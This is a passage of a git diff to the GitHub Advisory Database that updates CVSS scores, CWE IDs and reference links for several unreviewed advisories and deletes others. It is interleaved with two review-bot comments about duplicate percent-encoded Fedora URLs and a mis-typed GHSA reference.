"severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-01-09T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5r4m-4q9j-5jhh/GHSA-5r4m-4q9j-5jhh.json b/advisories/unreviewed/2022/05/GHSA-5r4m-4q9j-5jhh/GHSA-5r4m-4q9j-5jhh.json index eaf8e72370969..43a9a21884a93 100644 --- a/advisories/unreviewed/2022/05/GHSA-5r4m-4q9j-5jhh/GHSA-5r4m-4q9j-5jhh.json +++ b/advisories/unreviewed/2022/05/GHSA-5r4m-4q9j-5jhh/GHSA-5r4m-4q9j-5jhh.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" 
diff --git a/advisories/unreviewed/2022/05/GHSA-5rjh-29pm-3mx4/GHSA-5rjh-29pm-3mx4.json b/advisories/unreviewed/2022/05/GHSA-5rjh-29pm-3mx4/GHSA-5rjh-29pm-3mx4.json index fe050725006d7..ef009983cc273 100644 --- a/advisories/unreviewed/2022/05/GHSA-5rjh-29pm-3mx4/GHSA-5rjh-29pm-3mx4.json +++ b/advisories/unreviewed/2022/05/GHSA-5rjh-29pm-3mx4/GHSA-5rjh-29pm-3mx4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5rjh-29pm-3mx4", - "modified": "2022-05-24T19:21:18Z", + "modified": "2024-02-04T09:30:31Z", "published": "2022-05-24T19:21:18Z", "aliases": [ "CVE-2021-28709" ], "details": "issues with partially successful P2M updates on x86 T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, to provide a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages). In some cases the hypervisor carries out the requests by splitting them into smaller chunks. Error handling in certain PoD cases has been insufficient in that in particular partial success of some operations was not properly accounted for. There are two code paths affected - page removal (CVE-2021-28705) and insertion of new pages (CVE-2021-28709). (We provide one patch which combines the fix to both issues.)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -18,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28709" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -26,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" diff --git a/advisories/unreviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json b/advisories/unreviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json deleted file mode 100644 index 7e10f85e7aea2..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5v2j-w677-j4mp/GHSA-5v2j-w677-j4mp.json +++ /dev/null 
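Review bot: The two references added at the top of this hunk duplicate the two Fedora package-announce URLs that immediately follow them as context lines, differing only in `%40` versus `@` in the list address (`package-announce%40lists.fedoraproject.org` and `package-announce@lists.fedoraproject.org`), which decode to the same path and so point at the same message. The advisory now lists each of those references twice, which suggests the upstream feed switched to percent-encoding and the import compared URLs without normalising them; only one spelling should be kept, and a normalisation step before de-duplication would stop the same pair from reappearing on the next sync. The GLSA reference added in the second hunk is fine.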
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5v2j-w677-j4mp", - "modified": "2022-05-13T01:31:34Z", - "published": "2022-05-13T01:31:34Z", - "aliases": [ - "CVE-2019-1003027" - ], - "details": "A server-side request forgery vulnerability exists in Jenkins OctopusDeploy Plugin 1.8.1 and earlier in OctopusDeployPlugin.java that allows attackers with Overall/Read permission to have Jenkins connect to an attacker-specified URL and obtain the HTTP response code if successful, and exception error message otherwise.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003027" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-817" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107295" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-20T21:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json b/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json index 30bb9dbba5908..8ec48c5fd2861 100644 --- a/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json +++ b/advisories/unreviewed/2022/05/GHSA-6243-f9c4-77f4/GHSA-6243-f9c4-77f4.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6243-f9c4-77f4", - "modified": "2022-05-02T06:14:16Z", + "modified": "2024-02-02T18:30:21Z", "published": "2022-05-02T06:14:16Z", "aliases": [ "CVE-2010-0629" ], "details": "Use-after-free vulnerability in kadmin/server/server_stubs.c in kadmind in MIT Kerberos 5 (aka krb5) 1.5 through 1.6.3 allows remote authenticated users to cause a denial of service (daemon crash) via a request from a kadmin client that sends an invalid API version number.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -97,7 +100,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json b/advisories/unreviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json deleted file mode 100644 index 8e73006e7019f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-63cj-3r94-234v/GHSA-63cj-3r94-234v.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-63cj-3r94-234v", - "modified": "2022-05-17T00:29:01Z", - "published": "2022-05-17T00:29:01Z", - "aliases": [ - "CVE-2017-1000103" - ], - "details": "The custom Details view of the Static Analysis Utilities based DRY Plugin, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to this plugin could insert arbitrary HTML into this view.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000103" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-08-07/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/101061" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json b/advisories/unreviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json deleted file mode 100644 index 318f82531ce2a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-64cw-m57j-65xj/GHSA-64cw-m57j-65xj.json +++ /dev/null 
@@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-64cw-m57j-65xj", - "modified": "2022-05-17T19:57:30Z", - "published": "2022-05-17T19:57:30Z", - "aliases": [ - "CVE-2014-4967" - ], - "details": "Multiple argument injection vulnerabilities in Ansible before 1.6.7 allow remote attackers to execute arbitrary code by leveraging access to an Ansible managed host and providing a crafted fact, as demonstrated by a fact with (1) a trailing \" src=\" clause, (2) a trailing \" temp=\" clause, or (3) a trailing \" validate=\" clause accompanied by a shell command.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4967" - }, - { - "type": "WEB", - "url": "https://github.com/ansible/ansible/commit/62a1295a3e08cb6c3e9f1b2a1e6e5dcaeab32527" - }, - { - "type": "WEB", - "url": "http://www.ocert.org/advisories/ocert-2014-004.html" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-02-18T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json b/advisories/unreviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json deleted file mode 100644 index e9d0470e04abf..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-65cq-whr4-7c2v/GHSA-65cq-whr4-7c2v.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-65cq-whr4-7c2v", - "modified": "2022-05-17T00:32:26Z", - "published": "2022-05-17T00:32:26Z", - "aliases": [ - "CVE-2017-1000109" - ], - "details": "The custom Details view of the Static Analysis Utilities based OWASP Dependency-Check Plugin, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to this plugin could insert arbitrary HTML into this view.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000109" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-08-07/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/100227" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json b/advisories/unreviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json deleted file mode 100644 index ee1d378296ed2..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-65rj-cgrp-g65w/GHSA-65rj-cgrp-g65w.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-65rj-cgrp-g65w", - "modified": "2023-10-25T18:31:25Z", - "published": "2022-05-24T16:55:01Z", - "aliases": [ - "CVE-2019-10391" - ], - "details": "Jenkins IBM Application Security on Cloud Plugin 1.2.4 and earlier transmitted configured passwords in plain text as part of job configuration forms, potentially resulting in their exposure.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10391" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-08-28/#SECURITY-1512" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/08/28/4" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-319" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-08-28T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json b/advisories/unreviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json deleted file mode 100644 index 7d3059cb27634..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6667-f46p-pg88/GHSA-6667-f46p-pg88.json +++ /dev/null 
@@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6667-f46p-pg88", - "modified": "2022-05-17T19:57:32Z", - "published": "2022-05-17T19:57:32Z", - "aliases": [ - "CVE-2014-4659" - ], - "details": "Ansible before 1.5.5 sets 0644 permissions for sources.list, which might allow local users to obtain sensitive credential information in opportunistic circumstances by reading a file that uses the "deb http://user:pass@server:port/" format.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4659" - }, - { - "type": "WEB", - "url": "https://github.com/ansible/ansible/blob/release1.5.5/CHANGELOG.md" - }, - { - "type": "WEB", - "url": "https://www.securityfocus.com/bid/68234" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-02-20T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json b/advisories/unreviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json deleted file mode 100644 index c867901448fe6..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-687x-269m-7cv9", - "modified": "2022-05-14T03:46:09Z", - "published": "2022-05-14T03:46:09Z", - "aliases": [ - "CVE-2018-1000008" - ], - "details": "Jenkins PMD Plugin 3.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000008" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/102844" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-611" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json b/advisories/unreviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json deleted file mode 100644 index 4e73d132fffa6..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json +++ /dev/null 
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6h72-m3xw-fp3c", - "modified": "2022-05-13T01:40:56Z", - "published": "2022-05-13T01:40:56Z", - "aliases": [ - "CVE-2017-1000104" - ], - "details": "The Config File Provider Plugin is used to centrally manage configuration files that often include secrets, such as passwords. Users with only Overall/Read access to Jenkins were able to access URLs directly that allowed viewing these files. Access to view these files now requires sufficient permissions to configure the provided files, view the configuration of the folder in which the configuration files are defined, or have Job/Configure permissions to a job able to use these files.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000104" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-08-07/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-269" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json b/advisories/unreviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json deleted file mode 100644 index 6707054bd7daf..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6j5j-w6v4-rwqr", - "modified": "2022-05-13T01:25:43Z", - "published": "2022-05-13T01:25:43Z", - "aliases": [ - "CVE-2019-1003078" - ], - "details": "A cross-site request forgery vulnerability in Jenkins VMware Lab Manager Slaves Plugin in the LabManager.DescriptorImpl#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003078" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-979" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json b/advisories/unreviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json deleted file mode 100644 index 0fe26a14f940a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json +++ /dev/null 
@@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6m9f-8vwq-97pm", - "modified": "2022-05-02T04:00:47Z", - "published": "2022-05-02T04:00:47Z", - "aliases": [ - "CVE-2009-5054" - ], - "details": "Smarty before 3.0.0 beta 4 does not consider the umask value when setting the permissions of files, which might allow attackers to bypass intended access restrictions via standard filesystem operations.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-5054" - }, - { - "type": "WEB", - "url": "http://smarty-php.googlecode.com/svn/trunk/distribution/change_log.txt" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2011-02-03T17:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json b/advisories/unreviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json deleted file mode 100644 index 8488a96992978..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6mgq-vh7r-gccc", - "modified": "2022-05-13T01:25:42Z", - "published": "2022-05-13T01:25:42Z", - "aliases": [ - "CVE-2019-1003086" - ], - "details": "A cross-site request forgery vulnerability in Jenkins Chef Sinatra Plugin in the ChefBuilderConfiguration.DescriptorImpl#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003086" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1037" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json b/advisories/unreviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json deleted file mode 100644 index 2254975d5bed4..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6pj9-5q6j-j97c", - "modified": "2022-05-13T01:25:16Z", - "published": "2022-05-13T01:25:16Z", - "aliases": [ - "CVE-2019-1003083" - ], - "details": "A missing permission check in Jenkins Gearman Plugin in the GearmanPluginConfig#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003083" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-991" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-6pr6-q53r-2q97/GHSA-6pr6-q53r-2q97.json b/advisories/unreviewed/2022/05/GHSA-6pr6-q53r-2q97/GHSA-6pr6-q53r-2q97.json index 05a0640ae7212..57ddc916174d9 100644 --- a/advisories/unreviewed/2022/05/GHSA-6pr6-q53r-2q97/GHSA-6pr6-q53r-2q97.json +++ b/advisories/unreviewed/2022/05/GHSA-6pr6-q53r-2q97/GHSA-6pr6-q53r-2q97.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6pr6-q53r-2q97", - "modified": "2022-05-24T17:33:17Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-05-24T17:33:17Z", "aliases": [ "CVE-2020-15708" ], "details": "Ubuntu's packaging of libvirt in 20.04 LTS created a control socket with world read and write permissions. An attacker could use this to overwrite arbitrary files or execute arbitrary code.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json b/advisories/unreviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json deleted file mode 100644 index 2ef10b27304b2..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json +++ /dev/null 
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-6q4p-jrjv-44gf",
- "modified": "2023-02-02T21:34:15Z",
- "published": "2022-05-24T16:52:46Z",
- "aliases": [
- "CVE-2019-10386"
- ],
- "details": "A cross-site request forgery vulnerability in Jenkins XL TestView Plugin 1.2.0 and earlier in XLTestView.XLTestDescriptor#doTestConnection allows users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10386"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1008"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-08-07T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-6q78-w5mw-hqpj/GHSA-6q78-w5mw-hqpj.json b/advisories/unreviewed/2022/05/GHSA-6q78-w5mw-hqpj/GHSA-6q78-w5mw-hqpj.json
index 01e81c966d924..61c41569352e5 100644
--- a/advisories/unreviewed/2022/05/GHSA-6q78-w5mw-hqpj/GHSA-6q78-w5mw-hqpj.json
+++ b/advisories/unreviewed/2022/05/GHSA-6q78-w5mw-hqpj/GHSA-6q78-w5mw-hqpj.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-6q78-w5mw-hqpj",
- "modified": "2022-05-24T19:15:38Z",
+ "modified": "2024-02-07T18:30:26Z",
 "published": "2022-05-24T19:15:38Z",
 "aliases": [
 "CVE-2021-34699"
 ],
 "details": "A vulnerability in the TrustSec CLI parser of Cisco IOS and Cisco IOS XE Software could allow an authenticated, remote attacker to cause an affected device to reload. This vulnerability is due to an improper interaction between the web UI and the CLI parser. An attacker could exploit this vulnerability by requesting a particular CLI command to be run through the web UI. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H"
+ }
 ],
 "affected": [
@@ -25,6 +28,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-435",
 "CWE-436"
 ],
 "severity": "HIGH",
diff --git a/advisories/unreviewed/2022/05/GHSA-6q85-h749-54pf/GHSA-6q85-h749-54pf.json b/advisories/unreviewed/2022/05/GHSA-6q85-h749-54pf/GHSA-6q85-h749-54pf.json
index 091478755605b..0d7815c34225b 100644
--- a/advisories/unreviewed/2022/05/GHSA-6q85-h749-54pf/GHSA-6q85-h749-54pf.json
+++ b/advisories/unreviewed/2022/05/GHSA-6q85-h749-54pf/GHSA-6q85-h749-54pf.json
@@ -17,6 +17,10 @@
 ],
 "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/orangecertcc/security-research/security/advisories/GHSA-f49v-45qp-cv53"
+ },
 {
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7550"
diff --git a/advisories/unreviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json b/advisories/unreviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json
deleted file mode 100644
index b1d5153e3292d..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json
+++ /dev/null
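Review bot: In the GHSA-6q85-h749-54pf hunk (`@@ -17,6 +17,10 @@`) the new reference `https://github.com/orangecertcc/security-research/security/advisories/GHSA-f49v-45qp-cv53` is tagged `"type": "WEB"`, but it points at a GitHub Security Advisory for the same CVE-2018-7550, which is the same kind of document the NVD entry directly below it tags as `ADVISORY`; consumers that filter references by type will miss it. I would tag the new entry `"type": "ADVISORY",`. If the importer derives the type from NVD's reference tags this is a mapping gap in the sync step rather than something to hand-edit, but it is worth a curator flag either way.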
@@ -1,43 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-6x52-88cq-55q5",
- "modified": "2022-05-24T17:17:13Z",
- "published": "2022-05-24T17:17:13Z",
- "aliases": [
- "CVE-2020-12439"
- ],
- "details": "Grin before 3.1.0 allows attackers to adversely affect availability of data on a Mimblewimble blockchain.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12439"
- },
- {
- "type": "WEB",
- "url": "https://github.com/mimblewimble/grin/issues/3235"
- },
- {
- "type": "WEB",
- "url": "https://github.com/mimblewimble/grin/pull/3236"
- },
- {
- "type": "WEB",
- "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-12439.md"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
